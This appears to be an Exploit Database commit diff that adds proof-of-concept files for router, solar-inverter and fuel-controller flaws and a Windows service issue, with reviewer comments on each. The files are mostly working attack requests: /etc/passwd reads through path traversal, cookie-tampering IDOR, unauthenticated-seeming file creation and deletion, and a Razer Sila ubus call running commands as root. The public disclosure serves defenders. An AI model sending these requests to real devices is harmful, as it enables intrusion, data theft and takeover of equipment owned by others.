DB: 2022-04-12

7 changes to exploits/shellcodes

MiniTool Partition Wizard - Unquoted Service Path

Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI)
SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR)
Telesquare TLR-2855KS6 - Arbitrary File Creation
Telesquare TLR-2855KS6 - Arbitrary File Deletion
Razer Sila - Local File Inclusion (LFI)
Razer Sila - Command Injection
Offensive Security 2022-04-12 05:01:35 +00:00
parent 50cc2edafe
commit 6457d1796d
8 changed files with 241 additions and 0 deletions


@ -0,0 +1,35 @@
# Exploit Title: SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR)
# Date: 7/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://www.sma.de
# Version: SUNNY TRIPOWER 5.0 Firmware version 3.10.16.R
# Tested on: Linux [Firefox]
# CVE : CVE-2021-46416
# Proof of Concept
============[ Normal user request ]============
GET / HTTP/1.1
Host: 192.168.1.4
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A861%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D
Upgrade-Insecure-Requests: 1
============[ Manipulated username request ]============
GET / HTTP/1.1
Host: 192.168.1.4
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A850%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D
Upgrade-Insecure-Requests: 1
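Review bot: the second request's response is never shown, so the finding cannot be verified from the file alone; the only difference between the two requests is the `username` value inside the `user443` cookie (861 versus 850) with the same `sid`, and the file should include the response, or state which other user's data came back, to show the server honoured the client-supplied identity. The root cause worth stating for readers assessing risk is that identity and role (`bitMask`, `loginLevel`, `username`) travel in a client-editable cookie instead of being resolved server-side from the session; the fix is to look the user up from `sid` and ignore identity claims in the cookie. Minor: the `Date` header `7/4/2022` is ambiguous between 7 April and 4 July, and the other files in this commit use `4/9/2022` and `07/04/2022`, so one unambiguous format across the submissions would help.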


@ -0,0 +1,22 @@
# Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Creation
# Date: 7/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: http://www.telesquare.co.kr/
# Version: TLR-2855KS6
# Tested on: Linux [Firefox]
# CVE : CVE-2021-46418
# Proof of Concept
PUT /cgi-bin/testing_cve.txt HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: nonce=1642692359833588
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
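Review bot: the request stops at `Content-Length: 32` and neither the 32-byte body nor the server response appears, so the file does not demonstrate that anything was created; include the body and the response so the claim can be checked. The request carries only a `nonce` cookie and no credential, so it should say explicitly whether the PUT is reachable without authentication, since that decides the severity. Mitigation worth recording alongside the PoC: the HTTP server should refuse PUT (and DELETE, see the companion file) under `/cgi-bin/` unless the handler validates a session.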


@ -0,0 +1,23 @@
# Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Deletion
# Date: 7/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: http://www.telesquare.co.kr/
# Version: TLR-2855KS6
# Tested on: Linux [Firefox]
# CVE : CVE-2021-46419
# Proof of Concept
DELETE /cgi-bin/test.cgi HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 438
Origin: http://192.168.1.5
DNT: 1
Connection: close
Referer: http://192.168.1.5/
Cookie: nonce=16426923592222
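Review bot: `Content-Length: 438` is declared but no body and no response are shown, so the file neither explains what those 438 bytes are nor proves the deletion succeeded; add the body if one is required and the response, or drop the header if the body is empty. As in the companion file, the only token present is the `nonce` cookie, so state whether the DELETE works without authentication. Minor: `Content-type` is lowercase here but `Content-Type` in the file-creation PoC.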


@ -0,0 +1,36 @@
# Exploit Title: Razer Sila - Local File Inclusion (LFI)
# Google Dork: N/A
# Date: 4/9/2022
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
# Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
# Version: RazerSila-2.0.441_api-2.0.418
# Tested on: Razer Sila Router
# CVE N/A
# Proof of Concept
# Request
POST /ubus/ HTTP/1.1
Host: 192.168.8.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 123
Origin: https://192.168.8.1
Referer: https://192.168.8.1/
Te: trailers
Connection: close
{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}
# Reponse
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 537
{"jsonrpc":"2.0","id":3,"result":[0,{"data":"root:x:0:0:root:\/root:\/bin\/ash\ndaemon:*:1:1:daemon:\/var:\/bin\/false\nftp:*:55:55:ftp:\/home\/ftp:\/bin\/false\nnetwork:*:101:101:network:\/var:\/bin\/false\nnobody:*:65534:65534:nobody:\/var:\/bin\/false\ndnsmasq:x:453:453:dnsmasq:\/var\/run\/dnsmasq:\/bin\/false\nmosquitto:x:200:200:mosquitto:\/var\/run\/mosquitto:\/bin\/false\nlldp:x:121:129:lldp:\/var\/run\/lldp:\/bin\/false\nadmin:x:1000:1000:root:\/home\/admin:\/bin\/false\nportal:x:1001:1001::\/home\/portal:\/bin\/false\n"}]}
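Review bot: the ubus session token `4183f72884a98d7952d953dd9439a1d1` in `params` is presented without explanation; the file should say whether it comes from an authenticated login or is obtainable without credentials, because that is the difference between a post-auth and a pre-auth arbitrary file read and the request alone does not tell the reader. The issue visible in the request is that the `file` ubus object's `read` method is exposed to this session with an unrestricted `path`; the defensive fix is an ubus ACL that denies the `file` object to web sessions rather than filtering the path. Typo in the hunk: `# Reponse` should read `# Response`.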


@ -0,0 +1,61 @@
# Exploit Title: Razer Sila - Command Injection
# Google Dork: N/A
# Date: 4/9/2022
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
# Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
# Version: RazerSila-2.0.441_api-2.0.418
# Tested on: Razer Sila Router
# CVE N/A
# Proof of Concept
# Request
POST /ubus/ HTTP/1.1
Host: 192.168.8.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 117
Origin: https://192.168.8.1
Referer: https://192.168.8.1/
Te: trailers
Connection: close
{"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"id"}]}
# Response
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 85
{"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"uid=0(root) gid=0(root)\n"}]}
# Request
POST /ubus/ HTTP/1.1
Host: 192.168.8.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 117
Origin: https://192.168.8.1
Referer: https://192.168.8.1/
Te: trailers
Connection: close
{"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"ls"}]}
# Response
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 172
{"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"bin\ndev\netc\nhome\ninit\nlib\nmnt\nno_gui\noverlay\nproc\nrom\nroot\nsbin\nservices\nsys\ntmp\nusr\nvar\nwww\n"}]}
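Review bot: the title says Command Injection, but both requests invoke the ubus `file` object's `exec` method directly with `{"command":"id"}` and `{"command":"ls"}`, and the responses show the result as `uid=0(root)`; that is an RPC method exposed to the session without authorization (an ACL problem) rather than injection into an existing command string, and the classification should say so because the mitigation is an ubus ACL denying `file.exec` (and `file.read`, per the companion LFI file), not input sanitisation. As with the LFI file, how the session token `30ebdc7dd1f519beb4b2175e9dd8463e` was obtained is undocumented. The second request/response pair differs from the first only in the command and could be cut to keep the PoC short.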


@ -0,0 +1,26 @@
# Exploit Title: Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI)
# Date: 7/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://www.franklinfueling.com/
# Version: 1.8.19.8580
# Tested on: Linux [Firefox]
# CVE : CVE-2021-46417
# Proof of Concept
============[ HTTP Exploitation ]============
GET /18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1
Host: 192.168.1.6
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: Prefs=LID%3Des%3BPDS%3DMM/dd/yyyy%3BPDL%3DEEEE%2C%20MMMM%20dd%2C%20yyyy%3BPDY%3DMMMM%2C%20yyyy%3BPTS%3DHH%3Amm%3BPTL%3DHH%3Amm%3Ass%3BDSP%3D.%3BGSP%3D%2C%3BGRP%3D3%3BLDZ%3Dtrue%3BUVL%3DuvGallons%3BULN%3DulMillimeters%3BUTM%3DutCentigrade%3BUPR%3DupPSI%3BUP2%3Dup2inWater%3BUP3%3Dup3inHg%3BUFL%3Dufgpm%3BUDY%3Dudkgpcm%3BUMS%3Dumkgrams%3BRPR%3D30%3BXML%3Dfalse%3B
Upgrade-Insecure-Requests: 1
============[ URL Exploitation ]============
http://192.168.1.6/18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password=
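Review bot: the request sends `password=` empty and no response is included, so the file should show or describe the returned `/etc/passwd` content and state whether the `password` parameter is checked at all, since that determines whether this is a pre-auth read. The long `Prefs` cookie carries only locale and unit preferences and is almost certainly irrelevant to the bug; trimming it would make the request readable. For defenders, the URL form given at the end is the useful detection signature: a `file_name` value containing `../` sent to `tsaupload.cgi`. The `7/4/2022` date ambiguity noted on the other files applies here too.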


@ -0,0 +1,31 @@
# Exploit Title: MiniTool Partition Wizard - Unquoted Service Path
# Date: 07/04/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.minitool.com/
# Software Link: https://www.minitool.com/download-center/
# Version: 12.0
# Tested: Windows 10 Pro x64 es
# PoC :
C:\Users\saudh>sc qc MTSchedulerService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: MTSchedulerService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : MTSchedulerService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\saudh>icacls "C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe"
C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
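Review bot: the evidence does not establish exploitability: `sc qc` shows an unquoted `BINARY_PATH_NAME` containing spaces, `AUTO_START` and `LocalSystem`, but the `icacls` output covers the executable itself (`BUILTIN\Users:(I)(RX)`), which says nothing about whether a standard user can create a file in `C:\Program Files` or `C:\Program Files\MiniTool ShadowMaker`, the directories that matter for an unquoted-path hijack; default ACLs on `C:\Program Files` do not allow that, so either show the directory ACLs or note that the issue needs a non-default install location or permissions. The title says MiniTool Partition Wizard, yet `SERVICE_NAME`, `BINARY_PATH_NAME` and `DISPLAY_NAME` all point to MiniTool ShadowMaker; settle which product (and whether `Version: 12.0` belongs to it). `# Tested:` should be `# Tested on:` to match the other files. The vendor fix is simply to quote the path in the service's `ImagePath`.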


@ -11476,6 +11476,7 @@ id,file,description,date,author,type,platform,port
50837,exploits/windows/local/50837.txt,"ProtonVPN 1.26.0 - Unquoted Service Path",1970-01-01,gemreda,local,windows, 50837,exploits/windows/local/50837.txt,"ProtonVPN 1.26.0 - Unquoted Service Path",1970-01-01,gemreda,local,windows,
50852,exploits/windows/local/50852.txt,"Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path",1970-01-01,"Manthan Chhabra",local,windows, 50852,exploits/windows/local/50852.txt,"Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path",1970-01-01,"Manthan Chhabra",local,windows,
50858,exploits/linux/local/50858.txt,"binutils 2.37 - Objdump Segmentation Fault",1970-01-01,"Marlon Petry",local,linux, 50858,exploits/linux/local/50858.txt,"binutils 2.37 - Objdump Segmentation Fault",1970-01-01,"Marlon Petry",local,linux,
50859,exploits/windows/local/50859.txt,"MiniTool Partition Wizard - Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
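Review bot: the new row 50859 repeats the description "MiniTool Partition Wizard - Unquoted Service Path" while the `sc qc` output in 50859.txt names MiniTool ShadowMaker for the service, path and display name; whichever product name is settled on in the PoC file should be mirrored here so the index entry matches the affected software.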
@ -18662,6 +18663,7 @@ id,file,description,date,author,type,platform,port
50848,exploits/hardware/remote/50848.py,"Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)",1970-01-01,sharkmoos,remote,hardware, 50848,exploits/hardware/remote/50848.py,"Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)",1970-01-01,sharkmoos,remote,hardware,
50856,exploits/hardware/remote/50856.py,"Kramer VIAware - Remote Code Execution (RCE) (Root)",1970-01-01,sharkmoos,remote,hardware, 50856,exploits/hardware/remote/50856.py,"Kramer VIAware - Remote Code Execution (RCE) (Root)",1970-01-01,sharkmoos,remote,hardware,
50857,exploits/multiple/remote/50857.txt,"Opmon 9.11 - Cross-site Scripting",1970-01-01,"Marlon Petry",remote,multiple, 50857,exploits/multiple/remote/50857.txt,"Opmon 9.11 - Cross-site Scripting",1970-01-01,"Marlon Petry",remote,multiple,
50861,exploits/linux/remote/50861.txt,"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI)",1970-01-01,"Momen Eldawakhly",remote,linux,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
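Review bot: row 50861 files the Colibri Controller Module LFI as `remote,linux` while the same author's three other device findings in this commit (50860, 50862, 50863) are `webapps,hardware`; the Colibri PoC is likewise an HTTP request to an embedded controller, so the type/platform should be made consistent or the reason for the difference recorded.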
@ -44926,3 +44928,8 @@ id,file,description,date,author,type,platform,port
50853,exploits/php/webapps/50853.txt,"minewebcms 1.15.2 - Cross-site Scripting (XSS)",1970-01-01,"Chetanya Sharma",webapps,php, 50853,exploits/php/webapps/50853.txt,"minewebcms 1.15.2 - Cross-site Scripting (XSS)",1970-01-01,"Chetanya Sharma",webapps,php,
50854,exploits/php/webapps/50854.txt,"qdPM 9.2 - Cross-site Request Forgery (CSRF)",1970-01-01,"Chetanya Sharma",webapps,php, 50854,exploits/php/webapps/50854.txt,"qdPM 9.2 - Cross-site Request Forgery (CSRF)",1970-01-01,"Chetanya Sharma",webapps,php,
50855,exploits/php/webapps/50855.txt,"ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion",1970-01-01,"Devansh Bordia",webapps,php, 50855,exploits/php/webapps/50855.txt,"ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion",1970-01-01,"Devansh Bordia",webapps,php,
50860,exploits/hardware/webapps/50860.txt,"SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR)",1970-01-01,"Momen Eldawakhly",webapps,hardware,
50862,exploits/hardware/webapps/50862.txt,"Telesquare TLR-2855KS6 - Arbitrary File Creation",1970-01-01,"Momen Eldawakhly",webapps,hardware,
50863,exploits/hardware/webapps/50863.txt,"Telesquare TLR-2855KS6 - Arbitrary File Deletion",1970-01-01,"Momen Eldawakhly",webapps,hardware,
50864,exploits/hardware/webapps/50864.txt,"Razer Sila - Local File Inclusion (LFI)",1970-01-01,"Kevin Randall",webapps,hardware,
50865,exploits/hardware/webapps/50865.txt,"Razer Sila - Command Injection",1970-01-01,"Kevin Randall",webapps,hardware,
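Review bot: the two Razer Sila rows (50864, 50865) carry no version in the description although the PoC files state `RazerSila-2.0.441_api-2.0.418`, whereas neighbouring entries such as "Franklin Fueling Systems Colibri Controller Module 1.8.19.8580" and "ICEHRM 31.0.0.0S" include one; adding the version keeps the index usable for matching affected firmware. Row 50865's "Command Injection" wording should also follow whatever classification 50865.txt ends up with.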
